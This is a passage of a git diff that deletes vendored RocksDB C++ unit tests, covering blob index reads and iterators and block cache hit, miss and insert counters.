-    if (s.IsNotSupported()) {
-      return "NOT_SUPPORTED";
-    }
-    if (!s.ok()) {
-      return s.ToString();
-    }
-    return value.ToString();
-  }
-
-  std::string GetBlobIndex(const Slice& key,
-                           const Snapshot* snapshot = nullptr) {
-    bool is_blob_index = false;
-    std::string value = GetImpl(key, &is_blob_index, snapshot);
-    if (!is_blob_index) {
-      return "NOT_BLOB";
-    }
-    return value;
-  }
-
-  ArenaWrappedDBIter* GetBlobIterator() {
-    return dbfull()->NewIteratorImpl(ReadOptions(), cfd(),
-                                     dbfull()->GetLatestSequenceNumber(),
-                                     true /*allow_blob*/);
-  }
-
-  Options GetTestOptions() {
-    Options options;
-    options.create_if_missing = true;
-    options.num_levels = 2;
-    options.disable_auto_compactions = true;
-    // Disable auto flushes.
-    options.max_write_buffer_number = 10;
-    options.min_write_buffer_number_to_merge = 10;
-    options.merge_operator = MergeOperators::CreateStringAppendOperator();
-    return options;
-  }
-
-  void MoveDataTo(Tier tier) {
-    switch (tier) {
-      case Tier::kMemtable:
-        break;
-      case Tier::kImmutableMemtables:
-        ASSERT_OK(dbfull()->TEST_SwitchMemtable());
-        break;
-      case Tier::kL0SstFile:
-        ASSERT_OK(Flush());
-        break;
-      case Tier::kLnSstFile:
-        ASSERT_OK(Flush());
-        ASSERT_OK(Put("a", "dummy"));
-        ASSERT_OK(Put("z", "dummy"));
-        ASSERT_OK(Flush());
-        ASSERT_OK(
-            dbfull()->CompactRange(CompactRangeOptions(), nullptr, nullptr));
-#ifndef ROCKSDB_LITE
-        ASSERT_EQ("0,1", FilesPerLevel());
-#endif  // !ROCKSDB_LITE
-        break;
-    }
-  }
-};
-
-// Should be able to write kTypeBlobIndex to memtables and SST files.
-TEST_F(DBBlobIndexTest, Write) {
-  for (auto tier : kAllTiers) {
-    DestroyAndReopen(GetTestOptions());
-    for (int i = 1; i <= 5; i++) {
-      std::string index = ToString(i);
-      WriteBatch batch;
-      ASSERT_OK(PutBlobIndex(&batch, "key" + index, "blob" + index));
-      ASSERT_OK(Write(&batch));
-    }
-    MoveDataTo(tier);
-    for (int i = 1; i <= 5; i++) {
-      std::string index = ToString(i);
-      ASSERT_EQ("blob" + index, GetBlobIndex("key" + index));
-    }
-  }
-}
-
-// Get should be able to return blob index if is_blob_index is provided,
-// otherwise return Status::NotSupported status.
-TEST_F(DBBlobIndexTest, Get) {
-  for (auto tier : kAllTiers) {
-    DestroyAndReopen(GetTestOptions());
-    WriteBatch batch;
-    ASSERT_OK(batch.Put("key", "value"));
-    ASSERT_OK(PutBlobIndex(&batch, "blob_key", "blob_index"));
-    ASSERT_OK(Write(&batch));
-    MoveDataTo(tier);
-    // Verify normal value
-    bool is_blob_index = false;
-    PinnableSlice value;
-    ASSERT_EQ("value", Get("key"));
-    ASSERT_EQ("value", GetImpl("key"));
-    ASSERT_EQ("value", GetImpl("key", &is_blob_index));
-    ASSERT_FALSE(is_blob_index);
-    // Verify blob index
-    ASSERT_TRUE(Get("blob_key", &value).IsNotSupported());
-    ASSERT_EQ("NOT_SUPPORTED", GetImpl("blob_key"));
-    ASSERT_EQ("blob_index", GetImpl("blob_key", &is_blob_index));
-    ASSERT_TRUE(is_blob_index);
-  }
-}
-
-// Get should NOT return Status::NotSupported if blob index is updated with
-// a normal value.
-TEST_F(DBBlobIndexTest, Updated) {
-  for (auto tier : kAllTiers) {
-    DestroyAndReopen(GetTestOptions());
-    WriteBatch batch;
-    for (int i = 0; i < 10; i++) {
-      ASSERT_OK(PutBlobIndex(&batch, "key" + ToString(i), "blob_index"));
-    }
-    ASSERT_OK(Write(&batch));
-    // Avoid blob values from being purged.
-    const Snapshot* snapshot = dbfull()->GetSnapshot();
-    ASSERT_OK(Put("key1", "new_value"));
-    ASSERT_OK(Merge("key2", "a"));
-    ASSERT_OK(Merge("key2", "b"));
-    ASSERT_OK(Merge("key2", "c"));
-    ASSERT_OK(Delete("key3"));
-    ASSERT_OK(SingleDelete("key4"));
-    ASSERT_OK(Delete("key5"));
-    ASSERT_OK(Merge("key5", "a"));
-    ASSERT_OK(Merge("key5", "b"));
-    ASSERT_OK(Merge("key5", "c"));
-    ASSERT_OK(dbfull()->DeleteRange(WriteOptions(), cfh(), "key6", "key9"));
-    MoveDataTo(tier);
-    for (int i = 0; i < 10; i++) {
-      ASSERT_EQ("blob_index", GetBlobIndex("key" + ToString(i), snapshot));
-    }
-    ASSERT_EQ("new_value", Get("key1"));
-    ASSERT_EQ("NOT_SUPPORTED", GetImpl("key2"));
-    ASSERT_EQ("NOT_FOUND", Get("key3"));
-    ASSERT_EQ("NOT_FOUND", Get("key4"));
-    ASSERT_EQ("a,b,c", GetImpl("key5"));
-    for (int i = 6; i < 9; i++) {
-      ASSERT_EQ("NOT_FOUND", Get("key" + ToString(i)));
-    }
-    ASSERT_EQ("blob_index", GetBlobIndex("key9"));
-    dbfull()->ReleaseSnapshot(snapshot);
-  }
-}
-
-// Iterator should get blob value if allow_blob flag is set,
-// otherwise return Status::NotSupported status.
-TEST_F(DBBlobIndexTest, Iterate) {
-  const std::vector<std::vector<ValueType>> data = {
-      /*00*/ {kTypeValue},
-      /*01*/ {kTypeBlobIndex},
-      /*02*/ {kTypeValue},
-      /*03*/ {kTypeBlobIndex, kTypeValue},
-      /*04*/ {kTypeValue},
-      /*05*/ {kTypeValue, kTypeBlobIndex},
-      /*06*/ {kTypeValue},
-      /*07*/ {kTypeDeletion, kTypeBlobIndex},
-      /*08*/ {kTypeValue},
-      /*09*/ {kTypeSingleDeletion, kTypeBlobIndex},
-      /*10*/ {kTypeValue},
-      /*11*/ {kTypeMerge, kTypeMerge, kTypeMerge, kTypeBlobIndex},
-      /*12*/ {kTypeValue},
-      /*13*/
-      {kTypeMerge, kTypeMerge, kTypeMerge, kTypeDeletion, kTypeBlobIndex},
-      /*14*/ {kTypeValue},
-      /*15*/ {kTypeBlobIndex},
-      /*16*/ {kTypeValue},
-  };
-
-  auto get_key = [](int index) {
-    char buf[20];
-    snprintf(buf, sizeof(buf), "%02d", index);
-    return "key" + std::string(buf);
-  };
-
-  auto get_value = [&](int index, int version) {
-    return get_key(index) + "_value" + ToString(version);
-  };
-
-  auto check_iterator = [&](Iterator* iterator, Status::Code expected_status,
-                            const Slice& expected_value) {
-    ASSERT_EQ(expected_status, iterator->status().code());
-    if (expected_status == Status::kOk) {
-      ASSERT_TRUE(iterator->Valid());
-      ASSERT_EQ(expected_value, iterator->value());
-    } else {
-      ASSERT_FALSE(iterator->Valid());
-    }
-  };
-
-  auto create_normal_iterator = [&]() -> Iterator* {
-    return dbfull()->NewIterator(ReadOptions());
-  };
-
-  auto create_blob_iterator = [&]() -> Iterator* { return GetBlobIterator(); };
-
-  auto check_is_blob = [&](bool is_blob) {
-    return [is_blob](Iterator* iterator) {
-      ASSERT_EQ(is_blob,
-                reinterpret_cast<ArenaWrappedDBIter*>(iterator)->IsBlob());
-    };
-  };
-
-  auto verify = [&](int index, Status::Code expected_status,
-                    const Slice& forward_value, const Slice& backward_value,
-                    std::function<Iterator*()> create_iterator,
-                    std::function<void(Iterator*)> extra_check = nullptr) {
-    // Seek
-    auto* iterator = create_iterator();
-    ASSERT_OK(iterator->Refresh());
-    iterator->Seek(get_key(index));
-    check_iterator(iterator, expected_status, forward_value);
-    if (extra_check) {
-      extra_check(iterator);
-    }
-    delete iterator;
-
-    // Next
-    iterator = create_iterator();
-    ASSERT_OK(iterator->Refresh());
-    iterator->Seek(get_key(index - 1));
-    ASSERT_TRUE(iterator->Valid());
-    iterator->Next();
-    check_iterator(iterator, expected_status, forward_value);
-    if (extra_check) {
-      extra_check(iterator);
-    }
-    delete iterator;
-
-    // SeekForPrev
-    iterator = create_iterator();
-    ASSERT_OK(iterator->Refresh());
-    iterator->SeekForPrev(get_key(index));
-    check_iterator(iterator, expected_status, backward_value);
-    if (extra_check) {
-      extra_check(iterator);
-    }
-    delete iterator;
-
-    // Prev
-    iterator = create_iterator();
-    iterator->Seek(get_key(index + 1));
-    ASSERT_TRUE(iterator->Valid());
-    iterator->Prev();
-    check_iterator(iterator, expected_status, backward_value);
-    if (extra_check) {
-      extra_check(iterator);
-    }
-    delete iterator;
-  };
-
-  for (auto tier : {Tier::kMemtable} /*kAllTiers*/) {
-    // Avoid values from being purged.
-    std::vector<const Snapshot*> snapshots;
-    DestroyAndReopen(GetTestOptions());
-
-    // fill data
-    for (int i = 0; i < static_cast<int>(data.size()); i++) {
-      for (int j = static_cast<int>(data[i].size()) - 1; j >= 0; j--) {
-        std::string key = get_key(i);
-        std::string value = get_value(i, j);
-        WriteBatch batch;
-        switch (data[i][j]) {
-          case kTypeValue:
-            ASSERT_OK(Put(key, value));
-            break;
-          case kTypeDeletion:
-            ASSERT_OK(Delete(key));
-            break;
-          case kTypeSingleDeletion:
-            ASSERT_OK(SingleDelete(key));
-            break;
-          case kTypeMerge:
-            ASSERT_OK(Merge(key, value));
-            break;
-          case kTypeBlobIndex:
-            ASSERT_OK(PutBlobIndex(&batch, key, value));
-            ASSERT_OK(Write(&batch));
-            break;
-          default:
-            assert(false);
-        };
-      }
-      snapshots.push_back(dbfull()->GetSnapshot());
-    }
-    ASSERT_OK(
-        dbfull()->DeleteRange(WriteOptions(), cfh(), get_key(15), get_key(16)));
-    snapshots.push_back(dbfull()->GetSnapshot());
-    MoveDataTo(tier);
-
-    // Normal iterator
-    verify(1, Status::kNotSupported, "", "", create_normal_iterator);
-    verify(3, Status::kNotSupported, "", "", create_normal_iterator);
-    verify(5, Status::kOk, get_value(5, 0), get_value(5, 0),
-           create_normal_iterator);
-    verify(7, Status::kOk, get_value(8, 0), get_value(6, 0),
-           create_normal_iterator);
-    verify(9, Status::kOk, get_value(10, 0), get_value(8, 0),
-           create_normal_iterator);
-    verify(11, Status::kNotSupported, "", "", create_normal_iterator);
-    verify(13, Status::kOk,
-           get_value(13, 2) + "," + get_value(13, 1) + "," + get_value(13, 0),
-           get_value(13, 2) + "," + get_value(13, 1) + "," + get_value(13, 0),
-           create_normal_iterator);
-    verify(15, Status::kOk, get_value(16, 0), get_value(14, 0),
-           create_normal_iterator);
-
-    // Iterator with blob support
-    verify(1, Status::kOk, get_value(1, 0), get_value(1, 0),
-           create_blob_iterator, check_is_blob(true));
-    verify(3, Status::kOk, get_value(3, 0), get_value(3, 0),
-           create_blob_iterator, check_is_blob(true));
-    verify(5, Status::kOk, get_value(5, 0), get_value(5, 0),
-           create_blob_iterator, check_is_blob(false));
-    verify(7, Status::kOk, get_value(8, 0), get_value(6, 0),
-           create_blob_iterator, check_is_blob(false));
-    verify(9, Status::kOk, get_value(10, 0), get_value(8, 0),
-           create_blob_iterator, check_is_blob(false));
-    verify(11, Status::kNotSupported, "", "", create_blob_iterator);
-    verify(13, Status::kOk,
-           get_value(13, 2) + "," + get_value(13, 1) + "," + get_value(13, 0),
-           get_value(13, 2) + "," + get_value(13, 1) + "," + get_value(13, 0),
-           create_blob_iterator, check_is_blob(false));
-    verify(15, Status::kOk, get_value(16, 0), get_value(14, 0),
-           create_blob_iterator, check_is_blob(false));
-
-    for (auto* snapshot : snapshots) {
-      dbfull()->ReleaseSnapshot(snapshot);
-    }
-  }
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  rocksdb::port::InstallStackTraceHandler();
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/db/db_block_cache_test.cc b/thirdparty/rocksdb/db/db_block_cache_test.cc
deleted file mode 100644
index 169cadc..0000000
--- a/thirdparty/rocksdb/db/db_block_cache_test.cc
+++ /dev/null
@@ -1,579 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-#include <cstdlib>
-#include "cache/lru_cache.h"
-#include "db/db_test_util.h"
-#include "port/stack_trace.h"
-
-namespace rocksdb {
-
-class DBBlockCacheTest : public DBTestBase {
- private:
-  size_t miss_count_ = 0;
-  size_t hit_count_ = 0;
-  size_t insert_count_ = 0;
-  size_t failure_count_ = 0;
-  size_t compressed_miss_count_ = 0;
-  size_t compressed_hit_count_ = 0;
-  size_t compressed_insert_count_ = 0;
-  size_t compressed_failure_count_ = 0;
-
- public:
-  const size_t kNumBlocks = 10;
-  const size_t kValueSize = 100;
-
-  DBBlockCacheTest() : DBTestBase("/db_block_cache_test") {}
-
-  BlockBasedTableOptions GetTableOptions() {
-    BlockBasedTableOptions table_options;
-    // Set a small enough block size so that each key-value get its own block.
-    table_options.block_size = 1;
-    return table_options;
-  }
-
-  Options GetOptions(const BlockBasedTableOptions& table_options) {
-    Options options = CurrentOptions();
-    options.create_if_missing = true;
-    options.avoid_flush_during_recovery = false;
-    // options.compression = kNoCompression;
-    options.statistics = rocksdb::CreateDBStatistics();
-    options.table_factory.reset(new BlockBasedTableFactory(table_options));
-    return options;
-  }
-
-  void InitTable(const Options& options) {
-    std::string value(kValueSize, 'a');
-    for (size_t i = 0; i < kNumBlocks; i++) {
-      ASSERT_OK(Put(ToString(i), value.c_str()));
-    }
-  }
-
-  void RecordCacheCounters(const Options& options) {
-    miss_count_ = TestGetTickerCount(options, BLOCK_CACHE_MISS);
-    hit_count_ = TestGetTickerCount(options, BLOCK_CACHE_HIT);
-    insert_count_ = TestGetTickerCount(options, BLOCK_CACHE_ADD);
-    failure_count_ = TestGetTickerCount(options, BLOCK_CACHE_ADD_FAILURES);
-    compressed_miss_count_ =
-        TestGetTickerCount(options, BLOCK_CACHE_COMPRESSED_MISS);
-    compressed_hit_count_ =
-        TestGetTickerCount(options, BLOCK_CACHE_COMPRESSED_HIT);
-    compressed_insert_count_ =
-        TestGetTickerCount(options, BLOCK_CACHE_COMPRESSED_ADD);
-    compressed_failure_count_ =
-        TestGetTickerCount(options, BLOCK_CACHE_COMPRESSED_ADD_FAILURES);
-  }
-
-  void CheckCacheCounters(const Options& options, size_t expected_misses,
-                          size_t expected_hits, size_t expected_inserts,
-                          size_t expected_failures) {
-    size_t new_miss_count = TestGetTickerCount(options, BLOCK_CACHE_MISS);
-    size_t new_hit_count = TestGetTickerCount(options, BLOCK_CACHE_HIT);
-    size_t new_insert_count = TestGetTickerCount(options, BLOCK_CACHE_ADD);
-    size_t new_failure_count =
-        TestGetTickerCount(options, BLOCK_CACHE_ADD_FAILURES);
-    ASSERT_EQ(miss_count_ + expected_misses, new_miss_count);
-    ASSERT_EQ(hit_count_ + expected_hits, new_hit_count);
-    ASSERT_EQ(insert_count_ + expected_inserts, new_insert_count);
-    ASSERT_EQ(failure_count_ + expected_failures, new_failure_count);
-    miss_count_ = new_miss_count;
-    hit_count_ = new_hit_count;
-    insert_count_ = new_insert_count;
-    failure_count_ = new_failure_count;
-  }
-
-  void CheckCompressedCacheCounters(const Options& options,
-                                    size_t expected_misses,
-                                    size_t expected_hits,
-                                    size_t expected_inserts,
-                                    size_t expected_failures) {
-    size_t new_miss_count =
-        TestGetTickerCount(options, BLOCK_CACHE_COMPRESSED_MISS);
-    size_t new_hit_count =
-        TestGetTickerCount(options, BLOCK_CACHE_COMPRESSED_HIT);
-    size_t new_insert_count =
-        TestGetTickerCount(options, BLOCK_CACHE_COMPRESSED_ADD);
-    size_t new_failure_count =
-        TestGetTickerCount(options, BLOCK_CACHE_COMPRESSED_ADD_FAILURES);
-    ASSERT_EQ(compressed_miss_count_ + expected_misses, new_miss_count);
-    ASSERT_EQ(compressed_hit_count_ + expected_hits, new_hit_count);
-    ASSERT_EQ(compressed_insert_count_ + expected_inserts, new_insert_count);
-    ASSERT_EQ(compressed_failure_count_ + expected_failures, new_failure_count);
-    compressed_miss_count_ = new_miss_count;
-    compressed_hit_count_ = new_hit_count;
-    compressed_insert_count_ = new_insert_count;
-    compressed_failure_count_ = new_failure_count;
-  }
-};
-
-TEST_F(DBBlockCacheTest, TestWithoutCompressedBlockCache) {
-  ReadOptions read_options;
-  auto table_options = GetTableOptions();
-  auto options = GetOptions(table_options);
-  InitTable(options);
-
-  std::shared_ptr<Cache> cache = NewLRUCache(0, 0, false);
-  table_options.block_cache = cache;
-  options.table_factory.reset(new BlockBasedTableFactory(table_options));
-  Reopen(options);
-  RecordCacheCounters(options);
-
-  std::vector<std::unique_ptr<Iterator>> iterators(kNumBlocks - 1);
-  Iterator* iter = nullptr;
-
-  // Load blocks into cache.
-  for (size_t i = 0; i < kNumBlocks - 1; i++) {
-    iter = db_->NewIterator(read_options);
-    iter->Seek(ToString(i));
-    ASSERT_OK(iter->status());
-    CheckCacheCounters(options, 1, 0, 1, 0);
-    iterators[i].reset(iter);
-  }
-  size_t usage = cache->GetUsage();
-  ASSERT_LT(0, usage);
-  cache->SetCapacity(usage);
-  ASSERT_EQ(usage, cache->GetPinnedUsage());
-
-  // Test with strict capacity limit.
-  cache->SetStrictCapacityLimit(true);
-  iter = db_->NewIterator(read_options);
-  iter->Seek(ToString(kNumBlocks - 1));
-  ASSERT_TRUE(iter->status().IsIncomplete());
-  CheckCacheCounters(options, 1, 0, 0, 1);
-  delete iter;
-  iter = nullptr;
-
-  // Release interators and access cache again.
-  for (size_t i = 0; i < kNumBlocks - 1; i++) {
-    iterators[i].reset();
-    CheckCacheCounters(options, 0, 0, 0, 0);
-  }
-  ASSERT_EQ(0, cache->GetPinnedUsage());
-  for (size_t i = 0; i < kNumBlocks - 1; i++) {
-    iter = db_->NewIterator(read_options);
-    iter->Seek(ToString(i));
-    ASSERT_OK(iter->status());
-    CheckCacheCounters(options, 0, 1, 0, 0);
-    iterators[i].reset(iter);
-  }
-}
-
-#ifdef SNAPPY
-TEST_F(DBBlockCacheTest, TestWithCompressedBlockCache) {
-  ReadOptions read_options;
-  auto table_options = GetTableOptions();
-  auto options = GetOptions(table_options);
-  options.compression = CompressionType::kSnappyCompression;
-  InitTable(options);
-
-  std::shared_ptr<Cache> cache = NewLRUCache(0, 0, false);
-  std::shared_ptr<Cache> compressed_cache = NewLRUCache(1 << 25, 0, false);
-  table_options.block_cache = cache;
-  table_options.block_cache_compressed = compressed_cache;
-  options.table_factory.reset(new BlockBasedTableFactory(table_options));
-  Reopen(options);
-  RecordCacheCounters(options);
-
-  std::vector<std::unique_ptr<Iterator>> iterators(kNumBlocks - 1);
-  Iterator* iter = nullptr;
-
-  // Load blocks into cache.
-  for (size_t i = 0; i < kNumBlocks - 1; i++) {
-    iter = db_->NewIterator(read_options);
-    iter->Seek(ToString(i));
-    ASSERT_OK(iter->status());
-    CheckCacheCounters(options, 1, 0, 1, 0);
-    CheckCompressedCacheCounters(options, 1, 0, 1, 0);
-    iterators[i].reset(iter);
-  }
-  size_t usage = cache->GetUsage();
-  ASSERT_LT(0, usage);
-  ASSERT_EQ(usage, cache->GetPinnedUsage());
-  size_t compressed_usage = compressed_cache->GetUsage();
-  ASSERT_LT(0, compressed_usage);
-  // Compressed block cache cannot be pinned.
-  ASSERT_EQ(0, compressed_cache->GetPinnedUsage());
-
-  // Set strict capacity limit flag. Now block will only load into compressed
-  // block cache.
-  cache->SetCapacity(usage);
-  cache->SetStrictCapacityLimit(true);
-  ASSERT_EQ(usage, cache->GetPinnedUsage());
-  iter = db_->NewIterator(read_options);
-  iter->Seek(ToString(kNumBlocks - 1));
-  ASSERT_TRUE(iter->status().IsIncomplete());
-  CheckCacheCounters(options, 1, 0, 0, 1);
-  CheckCompressedCacheCounters(options, 1, 0, 1, 0);
-  delete iter;
-  iter = nullptr;
-
-  // Clear strict capacity limit flag. This time we shall hit compressed block
-  // cache.
-  cache->SetStrictCapacityLimit(false);
-  iter = db_->NewIterator(read_options);
-  iter->Seek(ToString(kNumBlocks - 1));
-  ASSERT_OK(iter->status());
-  CheckCacheCounters(options, 1, 0, 1, 0);
-  CheckCompressedCacheCounters(options, 0, 1, 0, 0);
-  delete iter;
-  iter = nullptr;
-}
-#endif  // SNAPPY
-
-#ifndef ROCKSDB_LITE
-
-// Make sure that when options.block_cache is set, after a new table is
-// created its index/filter blocks are added to block cache.
-TEST_F(DBBlockCacheTest, IndexAndFilterBlocksOfNewTableAddedToCache) {
-  Options options = CurrentOptions();
-  options.create_if_missing = true;
-  options.statistics = rocksdb::CreateDBStatistics();
-  BlockBasedTableOptions table_options;
-  table_options.cache_index_and_filter_blocks = true;
-  table_options.filter_policy.reset(NewBloomFilterPolicy(20));
-  options.table_factory.reset(new BlockBasedTableFactory(table_options));
-  CreateAndReopenWithCF({"pikachu"}, options);
-
-  ASSERT_OK(Put(1, "key", "val"));
-  // Create a new table.
-  ASSERT_OK(Flush(1));
-
-  // index/filter blocks added to block cache right after table creation.
-  ASSERT_EQ(1, TestGetTickerCount(options, BLOCK_CACHE_INDEX_MISS));
-  ASSERT_EQ(1, TestGetTickerCount(options, BLOCK_CACHE_FILTER_MISS));
-  ASSERT_EQ(2, /* only index/filter were added */
-            TestGetTickerCount(options, BLOCK_CACHE_ADD));
-  ASSERT_EQ(0, TestGetTickerCount(options, BLOCK_CACHE_DATA_MISS));
-  uint64_t int_num;
-  ASSERT_TRUE(
-      dbfull()->GetIntProperty("rocksdb.estimate-table-readers-mem", &int_num));
-  ASSERT_EQ(int_num, 0U);
-
-  // Make sure filter block is in cache.
-  std::string value;
-  ReadOptions ropt;
-  db_->KeyMayExist(ReadOptions(), handles_[1], "key", &value);
-
-  // Miss count should remain the same.
-  ASSERT_EQ(1, TestGetTickerCount(options, BLOCK_CACHE_FILTER_MISS));
-  ASSERT_EQ(1, TestGetTickerCount(options, BLOCK_CACHE_FILTER_HIT));
-
-  db_->KeyMayExist(ReadOptions(), handles_[1], "key", &value);
-  ASSERT_EQ(1, TestGetTickerCount(options, BLOCK_CACHE_FILTER_MISS));
-  ASSERT_EQ(2, TestGetTickerCount(options, BLOCK_CACHE_FILTER_HIT));
-
-  // Make sure index block is in cache.
-  auto index_block_hit = TestGetTickerCount(options, BLOCK_CACHE_INDEX_HIT);
-  value = Get(1, "key");
-  ASSERT_EQ(1, TestGetTickerCount(options, BLOCK_CACHE_INDEX_MISS));
-  ASSERT_EQ(index_block_hit + 1,
-            TestGetTickerCount(options, BLOCK_CACHE_INDEX_HIT));
-
-  value = Get(1, "key");
-  ASSERT_EQ(1, TestGetTickerCount(options, BLOCK_CACHE_INDEX_MISS));
-  ASSERT_EQ(index_block_hit + 2,
-            TestGetTickerCount(options, BLOCK_CACHE_INDEX_HIT));
-}
-
-TEST_F(DBBlockCacheTest, IndexAndFilterBlocksStats) {
-  Options options = CurrentOptions();
-  options.create_if_missing = true;
-  options.statistics = rocksdb::CreateDBStatistics();
-  BlockBasedTableOptions table_options;
-  table_options.cache_index_and_filter_blocks = true;
-  // 200 bytes are enough to hold the first two blocks
-  std::shared_ptr<Cache> cache = NewLRUCache(200, 0, false);
-  table_options.block_cache = cache;
-  table_options.filter_policy.reset(NewBloomFilterPolicy(20));
-  options.table_factory.reset(new BlockBasedTableFactory(table_options));
-  CreateAndReopenWithCF({"pikachu"}, options);
-
-  ASSERT_OK(Put(1, "key", "val"));
-  // Create a new table
-  ASSERT_OK(Flush(1));
-  size_t index_bytes_insert =
-      TestGetTickerCount(options, BLOCK_CACHE_INDEX_BYTES_INSERT);
-  size_t filter_bytes_insert =
-      TestGetTickerCount(options, BLOCK_CACHE_FILTER_BYTES_INSERT);
-  ASSERT_GT(index_bytes_insert, 0);
-  ASSERT_GT(filter_bytes_insert, 0);
-  ASSERT_EQ(cache->GetUsage(), index_bytes_insert + filter_bytes_insert);
-  // set the cache capacity to the current usage
-  cache->SetCapacity(index_bytes_insert + filter_bytes_insert);
-  ASSERT_EQ(TestGetTickerCount(options, BLOCK_CACHE_INDEX_BYTES_EVICT), 0);
-  ASSERT_EQ(TestGetTickerCount(options, BLOCK_CACHE_FILTER_BYTES_EVICT), 0);
-  ASSERT_OK(Put(1, "key2", "val"));
-  // Create a new table
-  ASSERT_OK(Flush(1));
-  // cache evicted old index and block entries
-  ASSERT_GT(TestGetTickerCount(options, BLOCK_CACHE_INDEX_BYTES_INSERT),
-            index_bytes_insert);
-  ASSERT_GT(TestGetTickerCount(options, BLOCK_CACHE_FILTER_BYTES_INSERT),
-            filter_bytes_insert);
-  ASSERT_EQ(TestGetTickerCount(options, BLOCK_CACHE_INDEX_BYTES_EVICT),
-            index_bytes_insert);
-  ASSERT_EQ(TestGetTickerCount(options, BLOCK_CACHE_FILTER_BYTES_EVICT),
-            filter_bytes_insert);
-}
-
-namespace {
-
-// A mock cache wraps LRUCache, and record how many entries have been
-// inserted for each priority.
-class MockCache : public LRUCache {
- public:
-  static uint32_t high_pri_insert_count;
-  static uint32_t low_pri_insert_count;
-
-  MockCache() : LRUCache(1 << 25, 0, false, 0.0) {}
-
-  virtual Status Insert(const Slice& key, void* value, size_t charge,
-                        void (*deleter)(const Slice& key, void* value),
-                        Handle** handle, Priority priority) override {
-    if (priority == Priority::LOW) {
-      low_pri_insert_count++;
-    } else {
-      high_pri_insert_count++;
-    }
-    return LRUCache::Insert(key, value, charge, deleter, handle, priority);
-  }
-};
-
-uint32_t MockCache::high_pri_insert_count = 0;
-uint32_t MockCache::low_pri_insert_count = 0;
-
-}  // anonymous namespace
-
-TEST_F(DBBlockCacheTest, IndexAndFilterBlocksCachePriority) {
-  for (auto priority : {Cache::Priority::LOW, Cache::Priority::HIGH}) {
-    Options options = CurrentOptions();
-    options.create_if_missing = true;
-    options.statistics = rocksdb::CreateDBStatistics();
-    BlockBasedTableOptions table_options;
-    table_options.cache_index_and_filter_blocks = true;
-    table_options.block_cache.reset(new MockCache());
-    table_options.filter_policy.reset(NewBloomFilterPolicy(20));
-    table_options.cache_index_and_filter_blocks_with_high_priority =
-        priority == Cache::Priority::HIGH ? true : false;
-    options.table_factory.reset(new BlockBasedTableFactory(table_options));
-    DestroyAndReopen(options);
-
-    MockCache::high_pri_insert_count = 0;
-    MockCache::low_pri_insert_count = 0;
-
-    // Create a new table.
-    ASSERT_OK(Put("foo", "value"));
-    ASSERT_OK(Put("bar", "value"));
-    ASSERT_OK(Flush());
-    ASSERT_EQ(1, NumTableFilesAtLevel(0));
-
-    // index/filter blocks added to block cache right after table creation.
-    ASSERT_EQ(1, TestGetTickerCount(options, BLOCK_CACHE_INDEX_MISS));
-    ASSERT_EQ(1, TestGetTickerCount(options, BLOCK_CACHE_FILTER_MISS));
-    ASSERT_EQ(2, /* only index/filter were added */
-              TestGetTickerCount(options, BLOCK_CACHE_ADD));
-    ASSERT_EQ(0, TestGetTickerCount(options, BLOCK_CACHE_DATA_MISS));
-    if (priority == Cache::Priority::LOW) {
-      ASSERT_EQ(0, MockCache::high_pri_insert_count);
-      ASSERT_EQ(2, MockCache::low_pri_insert_count);
-    } else {
-      ASSERT_EQ(2, MockCache::high_pri_insert_count);
-      ASSERT_EQ(0, MockCache::low_pri_insert_count);
-    }
-
-    // Access data block.
-    ASSERT_EQ("value", Get("foo"));
-
-    ASSERT_EQ(1, TestGetTickerCount(options, BLOCK_CACHE_INDEX_MISS));
-    ASSERT_EQ(1, TestGetTickerCount(options, BLOCK_CACHE_FILTER_MISS));
-    ASSERT_EQ(3, /*adding data block*/
-              TestGetTickerCount(options, BLOCK_CACHE_ADD));
-    ASSERT_EQ(1, TestGetTickerCount(options, BLOCK_CACHE_DATA_MISS));
-
-    // Data block should be inserted with low priority.
-    if (priority == Cache::Priority::LOW) {
-      ASSERT_EQ(0, MockCache::high_pri_insert_count);
-      ASSERT_EQ(3, MockCache::low_pri_insert_count);
-    } else {
-      ASSERT_EQ(2, MockCache::high_pri_insert_count);
-      ASSERT_EQ(1, MockCache::low_pri_insert_count);
-    }
-  }
-}
-
-TEST_F(DBBlockCacheTest, ParanoidFileChecks) {
-  Options options = CurrentOptions();
-  options.create_if_missing = true;
-  options.statistics = rocksdb::CreateDBStatistics();
-  options.level0_file_num_compaction_trigger = 2;
-  options.paranoid_file_checks = true;
-  BlockBasedTableOptions table_options;
-  table_options.cache_index_and_filter_blocks = false;
-  table_options.filter_policy.reset(NewBloomFilterPolicy(20));
-  options.table_factory.reset(new BlockBasedTableFactory(table_options));
-  CreateAndReopenWithCF({"pikachu"}, options);
-
-  ASSERT_OK(Put(1, "1_key", "val"));
-  ASSERT_OK(Put(1, "9_key", "val"));
-  // Create a new table.
-  ASSERT_OK(Flush(1));
-  ASSERT_EQ(1, /* read and cache data block */
-            TestGetTickerCount(options, BLOCK_CACHE_ADD));
-
-  ASSERT_OK(Put(1, "1_key2", "val2"));
-  ASSERT_OK(Put(1, "9_key2", "val2"));
-  // Create a new SST file. This will further trigger a compaction
-  // and generate another file.
-  ASSERT_OK(Flush(1));
-  dbfull()->TEST_WaitForCompact();
-  ASSERT_EQ(3, /* Totally 3 files created up to now */
-            TestGetTickerCount(options, BLOCK_CACHE_ADD));
-
-  // After disabling options.paranoid_file_checks. NO further block
-  // is added after generating a new file.
-  ASSERT_OK(
-      dbfull()->SetOptions(handles_[1], {{"paranoid_file_checks", "false"}}));
-
-  ASSERT_OK(Put(1, "1_key3", "val3"));
-  ASSERT_OK(Put(1, "9_key3", "val3"));
-  ASSERT_OK(Flush(1));
-  ASSERT_OK(Put(1, "1_key4", "val4"));
-  ASSERT_OK(Put(1, "9_key4", "val4"));
-  ASSERT_OK(Flush(1));
-  dbfull()->TEST_WaitForCompact();
-  ASSERT_EQ(3, /* Totally 3 files created up to now */
-            TestGetTickerCount(options, BLOCK_CACHE_ADD));
-}
-
-TEST_F(DBBlockCacheTest, CompressedCache) {
-  if (!Snappy_Supported()) {
